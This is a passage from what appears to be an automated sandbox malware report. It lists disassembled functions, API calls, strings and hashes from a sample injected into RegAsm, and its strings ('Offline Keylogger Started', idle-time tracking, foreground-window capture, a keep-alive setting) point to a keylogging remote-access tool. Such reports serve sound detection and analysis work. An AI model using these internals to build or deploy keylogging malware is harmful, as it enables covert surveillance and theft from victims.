                                                                                                                                    • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                                                    • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                                                                                                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                  • String ID: 8)3$P2$pQG$pQG
                                                                                                                                  • API String ID: 3795512280-3716193935
                                                                                                                                  • Opcode ID: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                                                                                                  • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                                                                                                  • Opcode Fuzzy Hash: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                                                                                                  • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                                                                                                                  Function 0040AD11 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                                                                                                  • GetForegroundWindow.USER32 ref: 0040AD84
                                                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000000,00000001,00000000), ref: 0040ADC1
                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                                                                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                                  • String ID: [${ User has been idle for $ minutes }$]
                                                                                                                                  • API String ID: 911427763-3954389425
                                                                                                                                  • Opcode ID: 67b6da18cae3e8576f7385e0c2c8ebcc1754692b360f15e2fa026ce444ac7b22
                                                                                                                                  • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                                                                                                  • Opcode Fuzzy Hash: 67b6da18cae3e8576f7385e0c2c8ebcc1754692b360f15e2fa026ce444ac7b22
                                                                                                                                  • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                                                                                                                                  Function 0040DA6F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1655 40da6f-40da94 call 401f86 1658 40da9a 1655->1658 1659 40dbbe-40dc56 call 401f04 GetLongPathNameW call 40417e * 2 call 40de0c call 402fa5 * 2 call 401f09 * 5 1655->1659 1661 40dae0-40dae7 call 41c048 1658->1661 1662 40daa1-40daa6 1658->1662 1663 40db93-40db98 1658->1663 1664 40dad6-40dadb 1658->1664 1665 40dba9 1658->1665 1666 40db9a-40dba7 call 43c11f 1658->1666 1667 40daab-40dab9 call 41b645 call 401f13 1658->1667 1668 40dacc-40dad1 1658->1668 1669 40db8c-40db91 1658->1669 1681 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1661->1681 1682 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1661->1682 1671 40dbae call 43c11f 1662->1671 1663->1671 1664->1671 1665->1671 1666->1665 1683 40dbb4-40dbb9 call 409092 1666->1683 1690 40dabe 1667->1690 1668->1671 1669->1671 1684 40dbb3 1671->1684 1691 40dac2-40dac7 call 401f09 1681->1691 1682->1690 1683->1659 1684->1683 1690->1691 1691->1659
                                                                                                                                  APIs
                                                                                                                                  • GetLongPathNameW.KERNEL32(00000000,?,00000208,00000000,?,00000030), ref: 0040DBD5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LongNamePath
                                                                                                                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                  • API String ID: 82841172-425784914
                                                                                                                                  • Opcode ID: b8d894b691b3e00382c27ba12a86ce93fa8d51d86cdbf8ec607a257f19f9a43d
                                                                                                                                  • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                                                                                  • Opcode Fuzzy Hash: b8d894b691b3e00382c27ba12a86ce93fa8d51d86cdbf8ec607a257f19f9a43d
                                                                                                                                  • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
                                                                                                                                  Function 10008821 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 216COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1737 10008821-1000883a 1738 10008850-10008855 1737->1738 1739 1000883c-1000884c call 10009341 1737->1739 1741 10008862-10008886 MultiByteToWideChar 1738->1741 1742 10008857-1000885f 1738->1742 1739->1738 1746 1000884e 1739->1746 1744 10008a19-10008a2c call 10002ada 1741->1744 1745 1000888c-10008898 1741->1745 1742->1741 1747 1000889a-100088ab 1745->1747 1748 100088ec 1745->1748 1746->1738 1751 100088ca-100088db call 100056d0 1747->1751 1752 100088ad-100088bc call 1000bf20 1747->1752 1750 100088ee-100088f0 1748->1750 1755 100088f6-10008909 MultiByteToWideChar 1750->1755 1756 10008a0e 1750->1756 1751->1756 1762 100088e1 1751->1762 1752->1756 1765 100088c2-100088c8 1752->1765 1755->1756 1759 1000890f-10008921 call 10005f19 1755->1759 1760 10008a10-10008a17 call 10008801 1756->1760 1767 10008926-1000892a 1759->1767 1760->1744 1766 100088e7-100088ea 1762->1766 1765->1766 1766->1750 1767->1756 1769 10008930-10008937 1767->1769 1770 10008971-1000897d 1769->1770 1771 10008939-1000893e 1769->1771 1772 100089c9 1770->1772 1773 1000897f-10008990 1770->1773 1771->1760 1774 10008944-10008946 1771->1774 1777 100089cb-100089cd 1772->1777 1775 10008992-100089a1 call 1000bf20 1773->1775 1776 100089ab-100089bc call 100056d0 1773->1776 1774->1756 1778 1000894c-10008966 call 10005f19 1774->1778 1781 10008a07-10008a0d call 10008801 1775->1781 1791 100089a3-100089a9 1775->1791 1776->1781 1793 100089be 1776->1793 1777->1781 1782 100089cf-100089e8 call 10005f19 1777->1782 1778->1760 1790 1000896c 1778->1790 1781->1756 1782->1781 1794 100089ea-100089f1 1782->1794 1790->1756 1795 100089c4-100089c7 1791->1795 1793->1795 1796 100089f3-100089f4 1794->1796 1797 10008a2d-10008a33 1794->1797 1795->1777 1798 100089f5-10008a05 WideCharToMultiByte 1796->1798 1797->1798 1798->1781 1799 10008a35-10008a3c call 10008801 1798->1799 1799->1760
                                                                                                                                  APIs
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                                  • __freea.LIBCMT ref: 10008A08
                                                                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                  • __freea.LIBCMT ref: 10008A11
                                                                                                                                  • __freea.LIBCMT ref: 10008A36
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                  • String ID: fYM/
                                                                                                                                  • API String ID: 1414292761-2459865102
                                                                                                                                  • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                  • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                                  • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                  • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                                                  Function 0041B354 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 61COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                    • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                                    • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                                    • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                                                    • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                                                  • StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                                  • String ID: (32 bit)$ (64 bit)$8)3$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                  • API String ID: 782494840-3200009476
                                                                                                                                  • Opcode ID: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                                                                                                                  • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                                                                                                  • Opcode Fuzzy Hash: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                                                                                                                  • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                                                                                                                  Function 0044ACC9 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                                                                                  • __freea.LIBCMT ref: 0044AEB0
                                                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                  • __freea.LIBCMT ref: 0044AEB9
                                                                                                                                  • __freea.LIBCMT ref: 0044AEDE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3864826663-0
                                                                                                                                  • Opcode ID: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                                                                                                  • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                                                                                                  • Opcode Fuzzy Hash: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                                                                                                  • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                                                                                                  Function 0041C482 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseHandle$CreatePointerWrite
                                                                                                                                  • String ID: xpF
                                                                                                                                  • API String ID: 1852769593-354647465
                                                                                                                                  • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                                                  • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                                                                                  • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                                                  • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                                                                                                  Function 0040A6B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                                                  • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                  • String ID: XQG
                                                                                                                                  • API String ID: 1958988193-3606453820
                                                                                                                                  • Opcode ID: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                                                                                  • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                                                                                                  • Opcode Fuzzy Hash: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                                                                                  • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                                                                                                  Function 00415B25 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountEventTick
                                                                                                                                  • String ID: !D@$NG
                                                                                                                                  • API String ID: 180926312-2721294649
                                                                                                                                  • Opcode ID: c3f80c094ccbf3a0d969685c917aabb4aee4931f33e0778c189d4cd75541e698
                                                                                                                                  • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                                                                                                  • Opcode Fuzzy Hash: c3f80c094ccbf3a0d969685c917aabb4aee4931f33e0778c189d4cd75541e698
                                                                                                                                  • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                                                                                                  Function 0040A1B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                                                                                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                  • String ID: Offline Keylogger Started
                                                                                                                                  • API String ID: 465354869-4114347211
                                                                                                                                  • Opcode ID: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
                                                                                                                                  • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                                                                                                  • Opcode Fuzzy Hash: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
                                                                                                                                  • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                                                                                                  Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                                                                                  Strings
                                                                                                                                  • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Create$EventLocalThreadTime
                                                                                                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                  • API String ID: 2532271599-1507639952
                                                                                                                                  • Opcode ID: 428bc55d4a31c43cbc360544c684b23c3ac7d4a2dd682b4fcf6922528a401838
                                                                                                                                  • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                                                                                                  • Opcode Fuzzy Hash: 428bc55d4a31c43cbc360544c684b23c3ac7d4a2dd682b4fcf6922528a401838
                                                                                                                                  • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                                                                                                  Function 004137AA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                                                                  • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                                                                                  • RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateValue
                                                                                                                                  • String ID: pth_unenc
                                                                                                                                  • API String ID: 1818849710-4028850238
                                                                                                                                  • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                                                                  • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                                                                                                  • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                                                                  • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                                                                                                  Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3360349984-0
                                                                                                                                  • Opcode ID: e2c7dcd9189a3044f1cf6e3ebfe82ec704a9a5fd688f20b61e04b54ec391fab7
                                                                                                                                  • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                                                                                                  • Opcode Fuzzy Hash: e2c7dcd9189a3044f1cf6e3ebfe82ec704a9a5fd688f20b61e04b54ec391fab7
                                                                                                                                  • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                                                                  Function 1000C7E6 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                  • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
